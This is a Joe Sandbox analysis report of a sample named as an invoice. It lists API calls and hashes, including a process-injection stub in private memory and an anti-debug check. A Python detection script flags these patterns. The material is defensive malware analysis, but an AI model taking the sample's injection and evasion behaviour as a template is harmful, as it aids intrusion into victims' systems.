                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                              • String ID:
                                                              • API String ID: 1012013722-0
                                                              • Opcode ID: 1d2aa8badde4d480e0f63d3bd3c0729132048c6b9fd0b2639340312d7a2316f8
                                                              • Instruction ID: 5dafc21da8fbeeb171437e7f31abfcc786aed727ceba01162704afd6294f9bf8
                                                              • Opcode Fuzzy Hash: 1d2aa8badde4d480e0f63d3bd3c0729132048c6b9fd0b2639340312d7a2316f8
                                                              • Instruction Fuzzy Hash: F8913434A20605DFCB18DF28C8D19A9B7E5EF59311B50806AED0A8F3A2DB30ED55CF84
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 001F3A73
                                                                • Part of subcall function 00211405: __lock.LIBCMT ref: 0021140B
                                                                • Part of subcall function 001F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001F3AF3
                                                                • Part of subcall function 001F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001F3B08
                                                                • Part of subcall function 001F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,001F3AA3,?), ref: 001F3D45
                                                                • Part of subcall function 001F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,001F3AA3,?), ref: 001F3D57
                                                                • Part of subcall function 001F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,002B1148,002B1130,?,?,?,?,001F3AA3,?), ref: 001F3DC8
                                                                • Part of subcall function 001F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,001F3AA3,?), ref: 001F3E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001F3AB3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: d1a640053f03be1ee485e5a362a24990741344cec60dbb59bf3cd34d94199194
                                                              • Instruction ID: fb1d337eec9a4a466bb86739a3b5e7d9eaabc56090671cbb89e49a151a15219e
                                                              • Opcode Fuzzy Hash: d1a640053f03be1ee485e5a362a24990741344cec60dbb59bf3cd34d94199194
                                                              • Instruction Fuzzy Hash: 28119071914341DBC300EF69EC4991AFBE8EF94710F004A1FF988872A2DB7095A9CF92
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0021EA29
                                                              • __close_nolock.LIBCMT ref: 0021EA42
                                                                • Part of subcall function 00217BDA: __getptd_noexit.LIBCMT ref: 00217BDA
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 07b5eb1cba07b738c54f4f50c6bddc29ee98d3d15e25dc56da84eddaf8108098
                                                              • Instruction ID: a3bd7e61dfaca9083e9aabd25f14ae9bb157c1abe0d917a8199d8b64cd9314ea
                                                              • Opcode Fuzzy Hash: 07b5eb1cba07b738c54f4f50c6bddc29ee98d3d15e25dc56da84eddaf8108098
                                                              • Instruction Fuzzy Hash: 521177729356108ADB12BF64DC467DD7AE16FA1335F1B4340E8215B1E2C7B489E08EA1
                                                              APIs
                                                                • Part of subcall function 0021395C: __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 0021395C: __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021395C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              • std::exception::exception.LIBCMT ref: 0020F51E
                                                              • __CxxThrowException@8.LIBCMT ref: 0020F533
                                                                • Part of subcall function 00216805: RaiseException.KERNEL32(?,?,0000000E,002A6A30,?,?,?,0020F538,0000000E,002A6A30,?,00000001), ref: 00216856
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: a767735a089ce1f222fbb07c75c6eaa0115f50ff39e1509396e5ede2f0316ca8
                                                              • Instruction ID: 4f9e9a2cfeaa3b225fc2e75bce4c884039818501c1679ba409cb4c9f7d24d06f
                                                              • Opcode Fuzzy Hash: a767735a089ce1f222fbb07c75c6eaa0115f50ff39e1509396e5ede2f0316ca8
                                                              • Instruction Fuzzy Hash: 4FF0F43116021E67CB10BFA8DD169DE7BECAF10314F608135FA08A24C2CBB096B48AA5
                                                              APIs
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __lock_file.LIBCMT ref: 00213629
                                                                • Part of subcall function 00214E1C: __lock.LIBCMT ref: 00214E3F
                                                              • __fclose_nolock.LIBCMT ref: 00213634
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 743adc9a600983ea47552ba26201384d6aef3c03e4341f2dac14f237c949ee8c
                                                              • Instruction ID: d160319c8e8b4318400887373f6442533b5be1a8aadb86339f4538e7ef1716f0
                                                              • Opcode Fuzzy Hash: 743adc9a600983ea47552ba26201384d6aef3c03e4341f2dac14f237c949ee8c
                                                              • Instruction Fuzzy Hash: 95F0F631820204AAD711BF6488067DE7AE66F61734F258108E420BB2C1CB7886A19E59
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction ID: 9e65fe44a2bb227765470190b7fd2a33122a780d6f7cfe6eef92e22e158aa249
                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction Fuzzy Hash: DC12DF24E18658C6EB24DF64D8507DEB232EF68300F1061E9910DEB7A5E77A4F81CF5A
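                                                              The entry above is the one to pull out of this section: its API ID is a process-manipulation triple (CreateProcessW, Wow64GetThreadContext, ReadProcessMemory) and its Memory Dump Source is a region at 0x00E24000 that is not backed by a PE image, unlike every other entry here, whose code sits in the 0x001F0000 image. The following Python is an added example, not Joe Sandbox's own code: it parses function entries in the layout this page uses (the "APIs", "Memory Dump Source" and "Similarity" bullets) and flags exactly that combination, plus anti-debug checks such as the IsDebuggerPresent subcall. The sample text is copied from this report. One assumption is labelled in the code: that the 5th dotted field of a .sdmp name is the region's PAGE_* protection and the 7th its MEM_* type, inferred from the values on this page (0x20/MEM_IMAGE for the .text section, 0x40/MEM_PRIVATE for the 0xE24000 region), not from a documented format. The severity rules are the editor's own.

```python
"""Parse Joe Sandbox per-function entries and flag analyst-relevant API patterns.

Added example, not Joe Sandbox code. It reads the 'APIs' / 'Memory Dump Source' /
'Similarity' bullets in the layout this report uses and flags process-manipulation
APIs called from memory that is not backed by a PE image, plus anti-debug checks.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two entries copied from this report, in the page's layout.
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
Memory Dump Source
• Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
APIs
• IsThemeActive.UXTHEME ref: 001F3A73
  • Part of subcall function 001F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,001F3AA3,?), ref: 001F3D57
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001F3AB3
Memory Dump Source
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
• Opcode ID: d1a640053f03be1ee485e5a362a24990741344cec60dbb59bf3cd34d94199194
"""

# Win32 constants from winnt.h.
# ASSUMPTION: the 5th dotted field of a Joe Sandbox .sdmp name is the region's
# PAGE_* protection and the 7th its MEM_* type. Inferred from this report's
# values (.text = 0x20/MEM_IMAGE, stub region = 0x40/MEM_PRIVATE), not documented.
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x01000000
MEM_PRIVATE = 0x00020000

# APIs that together create/patch/redirect another process.
INJECTION_APIS = {
    "CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
    "Wow64GetThreadContext", "GetThreadContext",
    "Wow64SetThreadContext", "SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
    "NtUnmapViewOfSection", "NtMapViewOfSection", "ResumeThread",
    "QueueUserAPC", "NtQueueApcThread",
}
ANTI_DEBUG_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                   "NtQueryInformationProcess", "OutputDebugStringW"}

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed by "Part of subcall function XXXX:".
API_RE = re.compile(r"^\s*•\s*(Part of subcall function [0-9A-F]+:\s*)?"
                    r"([\w:@]+)\.([A-Z0-9]+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-F]+)")
SRC_RE = re.compile(r"Source File:\s*(\S+\.sdmp),\s*Offset:\s*([0-9A-F]+),"
                    r"\s*based on PE:\s*(true|false)")
OPC_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")


@dataclass
class FunctionEntry:
    apis: List[Tuple[str, str, str, bool]] = field(default_factory=list)  # (api, module, ref, via_subcall)
    dump: str = ""
    offset: int = 0
    pe_backed: Optional[bool] = None
    opcode_id: str = ""

    def _dump_field(self, i: int) -> int:
        parts = self.dump.split(".")
        return int(parts[i], 16) if len(parts) > i else 0

    @property
    def protect(self) -> int:      # PAGE_* value, per the ASSUMPTION above
        return self._dump_field(4)

    @property
    def mem_type(self) -> int:     # MEM_* value, per the ASSUMPTION above
        return self._dump_field(6)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split report text into one FunctionEntry per 'APIs' block."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m.group(2), m.group(3), m.group(4), m.group(1) is not None))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.dump, cur.offset, cur.pe_backed = m.group(1), int(m.group(2), 16), m.group(3) == "true"
            continue
        m = OPC_RE.search(line)
        if m:
            cur.opcode_id = m.group(1)
    return entries


@dataclass
class Finding:
    opcode_id: str
    severity: str
    reason: str


def assess(entries: List[FunctionEntry]) -> List[Finding]:
    """Editor's own rules: injection APIs outside an image are the strong signal."""
    findings: List[Finding] = []
    for e in entries:
        names = {api for api, _, _, _ in e.apis}
        inj = sorted(names & INJECTION_APIS)
        dbg = sorted(names & ANTI_DEBUG_APIS)
        if inj and e.pe_backed is False:
            rwx = " RWX" if e.protect == PAGE_EXECUTE_READWRITE else ""
            findings.append(Finding(e.opcode_id, "high",
                f"{inj} called from non-image{rwx} memory at 0x{e.offset:08X} "
                f"(type 0x{e.mem_type:X}): process-injection stub"))
        elif inj:
            findings.append(Finding(e.opcode_id, "medium",
                f"{inj} in image-backed code at 0x{e.offset:08X}"))
        if dbg:
            where = "image-backed" if e.pe_backed else "non-image"
            findings.append(Finding(e.opcode_id, "low",
                f"anti-debug check {dbg} in {where} memory"))
    return findings


if __name__ == "__main__":
    for f in assess(parse_entries(SAMPLE)):
        print(f"[{f.severity:6}] {f.opcode_id[:16]}  {f.reason}")
```

                                                              Run against the two entries, the 0xE24000 function is reported as a high-severity injection stub in private RWX memory, and the IsDebuggerPresent subcall is reported as a low-severity anti-debug check that lives in the image-backed region, i.e. in the on-disk binary's own runtime rather than in the injected stage. Feeding the whole report through parse_entries gives an analyst the handful of entries worth opening in the disassembler instead of several hundred CRT helpers.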
                                                              APIs
                                                              • __flush.LIBCMT ref: 00212A0B
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: af98a3c31ee81b7e897a272503ad256954d7e88975545c640b745a1fa47b43ee
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: C8416071620707DFDF288E69C8815EE7BE6AF64360B24853DF855C7240EA709DF98B84
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 4141e755f8415d4e138a3c0eebfa2f60d0947f9b9bdbe13643fe977bdbb8bc79
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: DA31FA71A10206DBCB18DF18C490969FBBAFF49340B658AA5E409CF396DB30EDD1CB80
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: d64e5fb77bbdb09b926f15cd2b66f81244cdcde152a6a83921c6031d14e52a83
                                                              • Instruction ID: 3663187b49faf536556a92159e2c36264ded3dfb720da9056f0c20f445bf577b
                                                              • Opcode Fuzzy Hash: d64e5fb77bbdb09b926f15cd2b66f81244cdcde152a6a83921c6031d14e52a83
                                                              • Instruction Fuzzy Hash: ED31C275124628CFCF01AF10D4D566E7BB0FF48721F10844AEE951B386E7B0A929CF85
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: c0ac21f265b6588f610e06d94c98f98840e9e44707a17b9a4e7f635c3f7e7555
                                                              • Instruction ID: 35ca3acb81670a6cbdf01461d6e5157b6ce5ea27a1019e1991d12af1a886b280
                                                              • Opcode Fuzzy Hash: c0ac21f265b6588f610e06d94c98f98840e9e44707a17b9a4e7f635c3f7e7555
                                                              • Instruction Fuzzy Hash: A2415D705147018FEB24DF14C484B1ABBE0BF45308F1989ACE99A5B3A2C772F895CF52
                                                              APIs
                                                                • Part of subcall function 001F4214: FreeLibrary.KERNEL32(00000000,?), ref: 001F4247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001F39FE,?,00000001), ref: 001F41DB
                                                                • Part of subcall function 001F4291: FreeLibrary.KERNEL32(00000000), ref: 001F42C4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: d51ed22c189059d7e4b438717b535d1fcf2e928ffab6992e787d353be37f14e2
                                                              • Instruction ID: b34e73867847ff58f737be1d235faf075f9fa8c5fbb389f3085e96a7273a0e5a
                                                              • Opcode Fuzzy Hash: d51ed22c189059d7e4b438717b535d1fcf2e928ffab6992e787d353be37f14e2
                                                              • Instruction Fuzzy Hash: 8011A33161020AABDF14FF74EC06FBF77E9AF90700F108439B696A61C1DB749A519BA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: d7dc65bfc8cc211f07abb7c3c5341a228c37085d9ae1a997d88693447e9812dd
                                                              • Instruction ID: 4c466189c1d91b6587ca8181f6a35047ab3ca0efd082984772890a046175c2f0
                                                              • Opcode Fuzzy Hash: d7dc65bfc8cc211f07abb7c3c5341a228c37085d9ae1a997d88693447e9812dd
                                                              • Instruction Fuzzy Hash: CA2126705287018FEB24DF24C484B1ABBE1BF84304F154968E69A4B6A2C771F865CF52
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0021AFC0
                                                                • Part of subcall function 00217BDA: __getptd_noexit.LIBCMT ref: 00217BDA
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: f41ab09db3fdbcd21c8e331523864e98c90fc260d6cbe328d0f7129d370edaa5
                                                              • Instruction ID: 20efa336c4a5815ab13f945496cb4794274d49f432f9cb8057e1f5512b376f4b
                                                              • Opcode Fuzzy Hash: f41ab09db3fdbcd21c8e331523864e98c90fc260d6cbe328d0f7129d370edaa5
                                                              • Instruction Fuzzy Hash: 991163728396009FD7126FA4D8457EE36F19FA5335F294340E4345B1E2C7B589E08FA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction ID: 9aa309ff3efaad7466095c4472260523363430563f7eaad8db9a02755b978407
                                                              • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                              • Instruction Fuzzy Hash: 8E01367151010EEFCF05EF64C8918FFBB74AF20344F108065B66697195EB309A99DF60
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00212AED
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
